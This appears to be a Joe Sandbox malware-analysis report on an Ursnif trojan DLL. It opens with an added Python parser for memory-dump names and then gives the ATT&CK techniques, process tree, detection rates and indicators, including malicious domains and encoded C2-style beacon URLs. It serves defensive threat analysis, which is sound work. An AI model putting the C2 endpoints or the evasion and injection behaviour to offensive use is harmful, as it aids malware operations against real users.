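The Yara hit lists above name memory in two formats: the `.sdmp` dumps (process index, dump pass, dump id, base address, page protection, and a final field) and the `.unpack` names (process index, pass, image name, address of the extracted PE, index). Reading the protection field as the Win32 PAGE_* constant it carries makes the 0x40 (PAGE_EXECUTE_READWRITE) regions stand out, and matching `.unpack` addresses to those regions shows the unpacked Ursnif PE at the same offset, base+0xA31A, in every process the sample was loaded into. The Python below is an added example, not part of the report: the field layout is inferred from the identifiers on this page (the meaning of the last `.sdmp` field is left undecoded), the first two fields are read as hexadecimal (single-digit indices are the same either way), and the 1 MiB region bound is an assumption because the report lists no region sizes.

```python
"""Decode Joe Sandbox-style memory-dump (.sdmp) and unpacked-PE (.unpack) identifiers,
read the page-protection field and correlate the two. Added example; the layout of the
names is inferred from the report and the region size bound is an assumption."""
from __future__ import annotations
from dataclasses import dataclass
import re

# Win32 page protection constants (winnt.h). Field 5 of a dump name is read as one of these.
PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE", 0x08: "PAGE_WRITECOPY",
    0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE",
    0x80: "PAGE_EXECUTE_WRITECOPY",
}
# Inferred layout: process.pass.id.base.protect.extra.sdmp (the last field is kept raw)
SDMP_RE = re.compile(r"^([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.(\d+)\.([0-9A-Fa-f]{16})\."
                     r"([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.sdmp$")
# Inferred layout: process.pass.image.address.index[.raw].unpack (".raw" names the same region)
UNPACK_RE = re.compile(r"^(\d+)\.(\d+)\.(.+?)\.([0-9a-f]+)\.(\d+)(?:\.raw)?\.unpack$")
MAX_REGION = 0x100000   # assumed upper bound on a dumped region; the report lists no sizes


@dataclass(frozen=True)
class Dump:
    process: int
    pass_: int
    base: int
    protect: int
    extra: int
    name: str

    @property
    def protect_name(self) -> str:
        return PAGE_PROTECT.get(self.protect & 0xFF, f"0x{self.protect:x}")


@dataclass(frozen=True)
class Unpacked:
    process: int
    pass_: int
    image: str
    address: int
    name: str


@dataclass(frozen=True)
class Correlation:
    dump: Dump
    unpack: Unpacked | None

    @property
    def offset(self) -> int | None:
        return None if self.unpack is None else self.unpack.address - self.dump.base


def parse_dump(name: str) -> Dump:
    m = SDMP_RE.match(name)
    if not m:
        raise ValueError(f"not a dump identifier: {name}")
    proc, pass_, _dump_id, base, prot, extra = m.groups()
    return Dump(int(proc, 16), int(pass_, 16), int(base, 16), int(prot, 16), int(extra, 16), name)


def parse_unpack(name: str) -> Unpacked:
    m = UNPACK_RE.match(name)
    if not m:
        raise ValueError(f"not an unpack identifier: {name}")
    proc, pass_, image, addr, _index = m.groups()
    return Unpacked(int(proc), int(pass_), image, int(addr, 16), name)


def correlate(dump_names, unpack_names) -> list[Correlation]:
    """Pair each dump with the unpacked PE (same process and pass) whose address falls inside it."""
    regions = {}
    for u in map(parse_unpack, unpack_names):
        regions.setdefault((u.process, u.pass_, u.address), u)     # .raw and non-.raw collapse here
    out = []
    for d in map(parse_dump, dump_names):
        hit = next((u for u in regions.values()
                    if u.process == d.process and u.pass_ == d.pass_
                    and 0 <= u.address - d.base < MAX_REGION), None)
        out.append(Correlation(d, hit))
    return out


# Identifiers copied from the Yara hit lists above (a subset).
DUMPS = [
    "00000000.00000003.445970079.0000000000710000.00000040.00000001.sdmp",
    "00000002.00000003.412556442.00000000012F0000.00000040.00000001.sdmp",
    "00000003.00000003.413015029.0000000000C50000.00000040.00000001.sdmp",
    "00000000.00000002.643304809.00000000025C9000.00000004.00000040.sdmp",
    "00000006.00000003.444240615.0000000000B00000.00000040.00000001.sdmp",
    "00000004.00000003.436255990.0000000003420000.00000040.00000001.sdmp",
    "00000003.00000002.645427360.0000000004D09000.00000004.00000040.sdmp",
    "00000000.00000003.496226518.0000000002D28000.00000004.00000040.sdmp",
]
UNPACKS = [
    "0.2.loaddll32.exe.6ece0000.2.unpack", "4.3.rundll32.exe.342a31a.0.unpack",
    "0.3.loaddll32.exe.71a31a.0.unpack", "0.2.loaddll32.exe.750000.0.unpack",
    "3.2.rundll32.exe.12b0000.0.unpack", "2.3.rundll32.exe.12fa31a.0.unpack",
    "0.2.loaddll32.exe.25c94a0.1.unpack", "3.3.rundll32.exe.c5a31a.0.raw.unpack",
    "6.3.rundll32.exe.b0a31a.0.unpack", "3.2.rundll32.exe.4d094a0.1.raw.unpack",
]

if __name__ == "__main__":
    for c in correlate(DUMPS, UNPACKS):
        tag = f"{c.unpack.name} @ base+0x{c.offset:x}" if c.unpack else "no unpacked PE in region"
        print(f"proc {c.dump.process} pass {c.dump.pass_} base 0x{c.dump.base:08x} "
              f"{c.dump.protect_name:<24} {tag}")
```

The five RWX runtime dumps (processes 0, 2, 3, 4 and 6) each contain an unpacked PE at base+0xA31A, and the two pass-2 PAGE_READWRITE dumps each contain one at base+0x4A0; those are the regions to extract for static analysis, while the remaining PAGE_READWRITE dumps with Yara hits hold data rather than an extracted image.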

Mitre Att&ck Matrix

The matrix is listed here per tactic column. Only the techniques carrying a bracketed counter were matched by the report's signatures; the counter digits are reproduced as extracted, and the remaining entries are the grid's fixed vocabulary.

Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
Execution: Windows Management Instrumentation [2]; Native API [1]; At (Linux); At (Windows); Cron; Launchd; Scheduled Task; Command and Scripting Interpreter; PowerShell
Persistence: Path Interception; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job; At (Linux)
Privilege Escalation: Process Injection [112]; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job; At (Linux)
Defense Evasion: Virtualization/Sandbox Evasion [1]; Process Injection [112]; Deobfuscate/Decode Files or Information [1]; Obfuscated Files or Information [2]; Rundll32 [1]; Steganography; Compile After Delivery; Indicator Removal from Tools; Masquerading
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
Discovery: System Time Discovery [2]; Query Registry [1]; Security Software Discovery [21]; Virtualization/Sandbox Evasion [1]; Process Discovery [2]; Account Discovery [1]; System Owner/User Discovery [1]; Remote System Discovery [1]; System Information Discovery [23]
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Shared Webroot; Software Deployment Tools
Collection: Archive Collected Data [1]; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
Command and Control: Encrypted Channel [11]; Ingress Tool Transfer [3]; Non-Application Layer Protocol [3]; Application Layer Protocol [14]; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points; Downgrade to Insecure Protocols; Rogue Cellular Base Station
Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
Impact: Modify System Partition; Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact; Generate Fraudulent Advertising Revenue; Data Destruction

Behavior Graph

Behavior Graph ID: 500309; Sample: 6yDD19jMIu.dll; Start date: 11/10/2021; Architecture: WINDOWS; Score: 96
Sample-level signatures: Multi AV Scanner detection for domain / URL; Found malware configuration; Multi AV Scanner detection for submitted file; Yara detected Ursnif
loaddll32.exe [1] (started from the sample)
  DNS/IP: breuranel.website; areuranel.website; 10 other IPs or domains
  Signatures: Writes or reads registry keys via WMI; Writes registry values via WMI
  Started: rundll32.exe; cmd.exe [1]; rundll32.exe; rundll32.exe
rundll32.exe (first child of loaddll32.exe)
  Signatures: System process connects to network (likely due to code injection or exploit); Writes registry values via WMI
  Started: WerFault.exe [23 9]
cmd.exe (child of loaddll32.exe)
  Started: rundll32.exe
rundll32.exe (child of cmd.exe)
  DNS/IP: 40.101.9.178, 443, 49790, MICROSOFT-CORP-MSN-AS-BLOCKUS, United States; 52.98.208.66, 443, 49789, MICROSOFT-CORP-MSN-AS-BLOCKUS, United States; 11 other IPs or domains
  Signature: System process connects to network (likely due to code injection or exploit)
Second rundll32.exe (child of loaddll32.exe): started WerFault.exe [2 9]
Third rundll32.exe (child of loaddll32.exe): started WerFault.exe [9]
Bracketed numbers are the graph's per-process counters (created files and created registry values), reproduced as extracted.


Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label
6yDD19jMIu.dll | 9% | Virustotal | -
6yDD19jMIu.dll | 5% | ReversingLabs | -

The gap between the 9% and 5% verdicts on the DLL as submitted and the Avira detection of both unpacked regions below is the usual picture for a packed loader: static scanning of the file alone would not have flagged this sample with confidence.

Dropped Files

No Antivirus matches

Unpacked PE Files

Source | Detection | Scanner | Label
0.2.loaddll32.exe.750000.0.unpack | 100% | Avira | HEUR/AGEN.1108168
3.2.rundll32.exe.12b0000.0.unpack | 100% | Avira | HEUR/AGEN.1108168

Domains

Source | Detection | Scanner | Label
areuranel.website | 7% | Virustotal | -
breuranel.website | 7% | Virustotal | -

URLs

Source | Detection | Scanner | Label
https://mem.gfx.ms/meversion/?partner=msn&market=en-us" | 0% | Avira URL Cloud | safe
https://watson.telemetry.microsoftv | 0% | Avira URL Cloud | safe
https://blogs.msn.co | 0% | Avira URL Cloud | safe
https://deff.nelreports.net/api/report?cat=msn | 0% | URL Reputation | safe
https://web.vortex.d | 0% | Avira URL Cloud | safe

Domains and IPs

Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
msn.com | 13.82.28.61 | true | false |  | high
outlook.com | 40.97.161.50 | true | false |  | high
HHN-efz.ms-acdc.office.com | 52.98.152.242 | true | false |  | high
FRA-efz.ms-acdc.office.com | 52.97.137.242 | true | false |  | high
www.msn.com | unknown | unknown | false |  | high
www.outlook.com | unknown | unknown | false |  | high
areuranel.website | unknown | unknown | true |  | unknown
breuranel.website | unknown | unknown | true |  | unknown
outlook.office365.com | unknown | unknown | false |  | high

Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
https://www.outlook.com/signup/liopolo/OF4gRPjTZUDlGYAAVvEf/5pYiOfrf0jvlgxY8qHh/p55dSmorxy15cOpOjCNG64/UjL6twzH0ZDT9/vemXw0_2/BHJIawobBFS9v634s8Jd0nQ/EDL0vwxYRK/YS70ZLCNhojiUZnDZ/Tzx6t3xNPD_2/BtypzVe3uXX/kvPQnvsonQKCq7/2tOcdfZqZfkF2YDmPA0MA/3AJg52.jre | false |  | high
https://outlook.com/signup/liopolo/OF4gRPjTZUDlGYAAVvEf/5pYiOfrf0jvlgxY8qHh/p55dSmorxy15cOpOjCNG64/UjL6twzH0ZDT9/vemXw0_2/BHJIawobBFS9v634s8Jd0nQ/EDL0vwxYRK/YS70ZLCNhojiUZnDZ/Tzx6t3xNPD_2/BtypzVe3uXX/kvPQnvsonQKCq7/2tOcdfZqZfkF2YDmPA0MA/3AJg52.jre | false |  | high
https://outlook.office365.com/signup/liopolo/OF4gRPjTZUDlGYAAVvEf/5pYiOfrf0jvlgxY8qHh/p55dSmorxy15cOpOjCNG64/UjL6twzH0ZDT9/vemXw0_2/BHJIawobBFS9v634s8Jd0nQ/EDL0vwxYRK/YS70ZLCNhojiUZnDZ/Tzx6t3xNPD_2/BtypzVe3uXX/kvPQnvsonQKCq7/2tOcdfZqZfkF2YDmPA0MA/3AJg52.jre | false |  | high

URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
https://web.vortex.data.msn.com/collect/v1/t.gif?name=%27Ms.Webi.PageView%27&ver=%272.1%27&a | loaddll32.exe, 00000000.00000003.496097051.0000000002CA9000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.496583081.00000000051C9000.00000004.00000040.sdmp | false |  | high
https://mem.gfx.ms/meversion/?partner=msn&market=en-us" | loaddll32.exe, 00000000.00000003.496097051.0000000002CA9000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.496583081.00000000051C9000.00000004.00000040.sdmp | false | Avira URL Cloud: safe | unknown
https://watson.telemetry.microsoftv | WerFault.exe, 00000013.00000002.531558276.0000000004A0C000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://www.msn.com/?refurl=%2fmail%2fliopolo%2fjXTvRU37X%2fkKAN62uBd3tDT4UuvXf7%2ftv2pa650q_2BNc4gZ | loaddll32.exe, 00000000.00000003.496097051.0000000002CA9000.00000004.00000040.sdmp | false |  | high
http://ogp.me/ns# | loaddll32.exe, 00000000.00000003.496097051.0000000002CA9000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.496583081.00000000051C9000.00000004.00000040.sdmp | false |  | high
https://blogs.msn.co | loaddll32.exe, 00000000.00000003.496226518.0000000002D28000.00000004.00000040.sdmp | false | Avira URL Cloud: safe | unknown
https://blogs.msn.com/ | loaddll32.exe, 00000000.00000003.493105528.0000000002D28000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.493384184.0000000005248000.00000004.00000040.sdmp | false |  | high
https://deff.nelreports.net/api/report?cat=msn | loaddll32.exe, 00000000.00000003.496226518.0000000002D28000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.493384184.0000000005248000.00000004.00000040.sdmp | false | URL Reputation: safe | unknown
https://www.msn.com/en-us//api/modules/fetch" | loaddll32.exe, 00000000.00000003.496097051.0000000002CA9000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.496583081.00000000051C9000.00000004.00000040.sdmp | false |  | high
http://ogp.me/ns/fb# | loaddll32.exe, 00000000.00000003.496097051.0000000002CA9000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.496583081.00000000051C9000.00000004.00000040.sdmp | false |  | high
https://web.vortex.d | loaddll32.exe, 00000000.00000003.493105528.0000000002D28000.00000004.00000040.sdmp | false | Avira URL Cloud: safe | unknown

Contacted IPs

Public

IP | Domain | Country | ASN | ASN Name | Malicious
52.98.208.66 | unknown | United States | 8075 | MICROSOFT-CORP-MSN-AS-BLOCKUS | true
40.97.161.50 | outlook.com | United States | 8075 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false
52.98.152.242 | HHN-efz.ms-acdc.office.com | United States | 8075 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false
40.101.9.178 | unknown | United States | 8075 | MICROSOFT-CORP-MSN-AS-BLOCKUS | true
52.97.137.242 | FRA-efz.ms-acdc.office.com | United States | 8075 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false
13.82.28.61 | msn.com | United States | 8075 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false

Private

IP
192.168.2.1

General Information

Joe Sandbox Version: 33.0.0 White Diamond
Analysis ID: 500309
Start date: 11.10.2021
Start time: 22:47:28
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 9m 56s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: 6yDD19jMIu.dll
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Run name: Run with higher sleep bypass
Number of new started processes analysed: 32
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal96.troj.evad.winDLL@14/12@14/7
EGA Information: Failed
HDC Information:
• Successful, ratio: 18.2% (good quality ratio 17.4%)
• Quality average: 79%
• Quality standard deviation: 28.5%
HCA Information:
• Successful, ratio: 73%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Sleeps bigger than 120000ms are automatically reduced to 1000ms
• Found application associated with file extension: .dll
Warnings:
• Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, WerFault.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
• TCP Packets have been reduced to 100
• Excluded IPs from analysis (whitelisted): 204.79.197.200, 13.107.21.200, 52.139.176.199, 95.100.218.79, 95.100.216.89, 13.107.42.16, 13.107.5.88, 2.20.178.10, 2.20.178.56, 20.199.120.85, 20.49.157.6, 131.253.33.203, 2.20.178.18, 2.20.178.24, 20.189.173.20, 104.208.16.94, 52.184.81.210, 20.199.120.182, 40.112.88.60
• Excluded domains from analysis (whitelisted): client-office365-tas.msedge.net, ocos-office365-s2s.msedge.net, config.edge.skype.com.trafficmanager.net, store-images.s-microsoft.com-c.edgekey.net, e-0009.e-msedge.net, a767.dspw65.akamai.net, a-0003.dc-msedge.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, e12564.dspb.akamaiedge.net, wns.notify.trafficmanager.net, config-edge-skype.l-0007.l-msedge.net, www-bing-com.dual-a-0001.a-msedge.net, arc.trafficmanager.net, img-prod-cms-rt-microsoft-com.akamaized.net, watson.telemetry.microsoft.com, prod.fs.microsoft.com.akadns.net, l-0007.l-msedge.net, config.edge.skype.com, onedsblobprdcus16.centralus.cloudapp.azure.com, www.bing.com, client.wns.windows.com, fs.microsoft.com, afdo-tas-offload.trafficmanager.net, iris-de-prod-azsc-eas.eastasia.cloudapp.azure.com, dual-a-0001.a-msedge.net, wu-shim.trafficmanager.net, ris-prod.trafficmanager.net, onedsblobprdwus15.westus.cloudapp.azure.com, asf-ris-prod-neu.northeurope.cloudapp.azure.com, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, www-msn-com.a-0003.a-msedge.net, iris-de-prod-azsc-eas-b.eastasia.cloudapp.azure.com, download.windowsupdate.com.edgesuite.net, ocos-office365-s2s-msedge-net.e-0009.e-msedge.net, ris.api.iris.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, l-0007.config.skype.com, icePrime.a-0003.dc-msedge.net, iris-de-ppe-azsc-uks.uksouth.cloudapp.azure.com, blobcollector.events.data.trafficmanager.net
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time | Type | Description
22:50:08 | API Interceptor | 1x Sleep call for process: rundll32.exe modified

Joe Sandbox View / Context

IPs

Match | Associated Sample Name / URL | Detection
52.98.208.66 | B6VQd36tt6.dll | malicious
40.97.161.50 | 6yDD19jMIu.dll | malicious
40.97.161.50 | B6VQd36tt6.dll | malicious
40.97.161.50 | test1.dll | malicious
40.97.161.50 | 6.dll | malicious
40.97.161.50 | 6101135878f66.dll | malicious
40.97.161.50 | a9FUs89dWy.dll | malicious
40.97.161.50 | 609a460e94791.tiff.dll | malicious
40.97.161.50 | 13fil.exe | malicious
40.97.161.50 | 24messag.exe | malicious
40.97.161.50 | .exe | malicious
40.97.161.50 | .exe | malicious
40.97.161.50 | 66documen.exe | malicious
40.97.161.50 | 9messag.exe | malicious
52.98.152.242 | 611237846402f.dll | malicious
40.101.9.178 | uT9rwkGATJ.dll | malicious
40.101.9.178 | .exe | malicious
40.101.9.178 | https://grandmaster.tempors.com/ | malicious

Domains

Match | Associated Sample Name / URL | Detection | Context
outlook.com | P2AN3Yrtnz.exe | malicious | 40.93.212.0
outlook.com | Hm7d40tE44.exe | malicious | 104.47.53.36
outlook.com | SecuriteInfo.com.W32.AIDetect.malware2.21009.exe | malicious | 104.47.53.36
outlook.com | in7BcpKNoa.exe | malicious | 40.93.212.0
outlook.com | aXNdDIO708.exe | malicious | 104.47.53.36
outlook.com | vhPaw5lCuv.exe | malicious | 40.93.212.0
outlook.com | 5sTWnI5RoC.exe | malicious | 40.93.207.0
outlook.com | 57wF9hu0V5.exe | malicious | 40.93.207.0
outlook.com | 7zxmUw3Ml1.exe | malicious | 104.47.53.36
outlook.com | Nh1UI4PFGW.exe | malicious | 52.101.24.0
outlook.com | rEYF2xcbGR.exe | malicious | 40.93.207.1
outlook.com | G2Shy4flZe.exe | malicious | 40.93.207.1
outlook.com | 2nqVnWlyLp.exe | malicious | 52.101.24.0
outlook.com | nFkQ33d7Ec.exe | malicious | 104.47.53.36
outlook.com | QE66HWdeTM.exe | malicious | 40.93.207.0
outlook.com | 2H69p1kjC4.exe | malicious | 40.93.207.1

ASN

Match | Associated Sample Name / URL | Detection | Context
MICROSOFT-CORP-MSN-AS-BLOCKUS | 6yDD19jMIu.dll | malicious | 13.82.28.61
MICROSOFT-CORP-MSN-AS-BLOCKUS | B6VQd36tt6.dll | malicious | 13.82.28.61
MICROSOFT-CORP-MSN-AS-BLOCKUS | B6VQd36tt6.dll | malicious | 52.97.183.162
MICROSOFT-CORP-MSN-AS-BLOCKUS | P2AN3Yrtnz.exe | malicious | 40.93.212.0
MICROSOFT-CORP-MSN-AS-BLOCKUS | b3astmode.x86 | malicious | 72.154.237.78
MICROSOFT-CORP-MSN-AS-BLOCKUS | b3astmode.arm7 | malicious | 20.153.181.154
MICROSOFT-CORP-MSN-AS-BLOCKUS | b3astmode.arm7-20211011-1850 | malicious | 20.63.129.213
MICROSOFT-CORP-MSN-AS-BLOCKUS | TNIZtb3HS3.exe | malicious | 20.42.65.92
MICROSOFT-CORP-MSN-AS-BLOCKUS | PROFORMA INVOICE -PI6120..html | malicious | 40.101.62.34
MICROSOFT-CORP-MSN-AS-BLOCKUS | setup_x86_x64_install.exe | malicious | 52.168.117.173
MICROSOFT-CORP-MSN-AS-BLOCKUS | ntpclient | malicious | 21.215.78.72
MICROSOFT-CORP-MSN-AS-BLOCKUS | 2021catalog-selected products.xlsm | malicious | 13.92.100.208
MICROSOFT-CORP-MSN-AS-BLOCKUS | K6E9636Koq | malicious | 159.27.209.248
MICROSOFT-CORP-MSN-AS-BLOCKUS | setup_x86_x64_install.exe | malicious | 20.42.73.29
MICROSOFT-CORP-MSN-AS-BLOCKUS | Hm7d40tE44.exe | malicious | 104.47.53.36
MICROSOFT-CORP-MSN-AS-BLOCKUS | mixsix_20211008-150045.exe | malicious | 20.189.173.22
MICROSOFT-CORP-MSN-AS-BLOCKUS | SecuriteInfo.com.W32.AIDetect.malware2.21009.exe | malicious | 104.47.53.36
MICROSOFT-CORP-MSN-AS-BLOCKUS | in7BcpKNoa.exe | malicious | 40.93.212.0
MICROSOFT-CORP-MSN-AS-BLOCKUS | xiaomi-home.apk | malicious | 104.45.180.93
MICROSOFT-CORP-MSN-AS-BLOCKUS | canon-camera-connect.apk | malicious | 104.45.180.93

JA3 Fingerprints

Match: ce5f3254611a8c095a3d821d44539877

Associated Sample Name / URL                        Detection   Context
6yDD19jMIu.dll                                      malicious   52.98.208.66, 40.97.161.50, 52.98.152.242, 40.101.9.178, 52.97.137.242, 13.82.28.61
B6VQd36tt6.dll                                      malicious   52.98.208.66, 40.97.161.50, 52.98.152.242, 40.101.9.178, 52.97.137.242, 13.82.28.61
B6VQd36tt6.dll                                      malicious   52.98.208.66, 40.97.161.50, 52.98.152.242, 40.101.9.178, 52.97.137.242, 13.82.28.61
setup_x86_x64_install.exe                           malicious   52.98.208.66, 40.97.161.50, 52.98.152.242, 40.101.9.178, 52.97.137.242, 13.82.28.61
aVFOmbW2t7.dll                                      malicious   52.98.208.66, 40.97.161.50, 52.98.152.242, 40.101.9.178, 52.97.137.242, 13.82.28.61
gxJ83rJkgw.msi                                      malicious   52.98.208.66, 40.97.161.50, 52.98.152.242, 40.101.9.178, 52.97.137.242, 13.82.28.61
yR4AxlwcWJ.exe                                      malicious   52.98.208.66, 40.97.161.50, 52.98.152.242, 40.101.9.178, 52.97.137.242, 13.82.28.61
BsyK7FB5DQ.exe                                      malicious   52.98.208.66, 40.97.161.50, 52.98.152.242, 40.101.9.178, 52.97.137.242, 13.82.28.61
SGfGZT66wD.exe                                      malicious   52.98.208.66, 40.97.161.50, 52.98.152.242, 40.101.9.178, 52.97.137.242, 13.82.28.61
uT9rwkGATJ.dll                                      malicious   52.98.208.66, 40.97.161.50, 52.98.152.242, 40.101.9.178, 52.97.137.242, 13.82.28.61
XK1PLPuwjL.exe                                      malicious   52.98.208.66, 40.97.161.50, 52.98.152.242, 40.101.9.178, 52.97.137.242, 13.82.28.61
pHEiqE9toa.msi                                      malicious   52.98.208.66, 40.97.161.50, 52.98.152.242, 40.101.9.178, 52.97.137.242, 13.82.28.61
SecuriteInfo.com.W32.AIDetect.malware2.24481.exe    malicious   52.98.208.66, 40.97.161.50, 52.98.152.242, 40.101.9.178, 52.97.137.242, 13.82.28.61
vH0SHswvrb.exe                                      malicious   52.98.208.66, 40.97.161.50, 52.98.152.242, 40.101.9.178, 52.97.137.242, 13.82.28.61
NM0NyvZi8O.exe                                      malicious   52.98.208.66, 40.97.161.50, 52.98.152.242, 40.101.9.178, 52.97.137.242, 13.82.28.61
yOTzv1Qz0n.exe                                      malicious   52.98.208.66, 40.97.161.50, 52.98.152.242, 40.101.9.178, 52.97.137.242, 13.82.28.61
SWaTAV7EdD.exe                                      malicious   52.98.208.66, 40.97.161.50, 52.98.152.242, 40.101.9.178, 52.97.137.242, 13.82.28.61
SKMC07102021.exe                                    malicious   52.98.208.66, 40.97.161.50, 52.98.152.242, 40.101.9.178, 52.97.137.242, 13.82.28.61
50r72IVfM0.msi                                      malicious   52.98.208.66, 40.97.161.50, 52.98.152.242, 40.101.9.178, 52.97.137.242, 13.82.28.61
setup_x86_x64_install.exe                           malicious   52.98.208.66, 40.97.161.50, 52.98.152.242, 40.101.9.178, 52.97.137.242, 13.82.28.61

Dropped Files

No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_69688d2812e06195cef530d1f4e704d7e967697_82810a17_00b0a647\Report.wer
Process: C:\Windows\SysWOW64\WerFault.exe
File Type: Little-endian UTF-16 Unicode text, with CRLF line terminators
Category: dropped
Size (bytes): 12044
Entropy (8bit): 3.7642068300312155
Encrypted: false
SSDEEP: 192:iHiL0oXzHBUZMX4jed+x/u7saS274It7cF:SiVXzBUZMX4jec/u7saX4It7cF
MD5: 731DA60D71432CA663B1FDB49265A20A
SHA1: 9C0CFA5DF7944AD7166177790882FA3272752727
SHA-256: 0BD961F31FA68DC24A3ADA2BEAB0AE6165B3526DE4387C381F0BAF37E3D6DCDB
SHA-512: F7F1876955A8551D510CDB8BCDE5CF73E5B689FA94669A6BA80E61A22E86831EA80B0B640521F7D58FF829161DB05609D0BF4B59AFF3B870E5DE97F24CFA2A57
Malicious: false
Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.2.7.8.4.9.1.4.1.9.8.6.2.7.5.2.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.7.8.4.9.1.4.3.5.3.0.0.2.5.2.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.9.9.a.9.8.f.6.-.3.7.a.6.-.4.2.4.c.-.b.d.2.e.-.6.6.6.3.f.8.4.f.5.b.0.a.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.f.a.a.7.4.6.3.-.f.a.4.d.-.4.6.2.2.-.b.c.f.c.-.e.e.b.6.4.b.1.2.3.9.b.4.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.7.a.0.-.0.0.0.1.-.0.0.1.6.-.c.c.3.3.-.3.e.c.7.2.c.b.f.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.b.c.c.5.d.c.3.2.2.2.0.3.4.d.3.f.2.5.7.f.1.f.d.3.5.8.8.9.e.5.b.e.9.0.f.0.9.b.5.f.!.r.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_69688d2812e06195cef530d1f4e704d7e967697_82810a17_02b4adf8\Report.wer
Process: C:\Windows\SysWOW64\WerFault.exe
File Type: Little-endian UTF-16 Unicode text, with CRLF line terminators
Category: dropped
Size (bytes): 12042
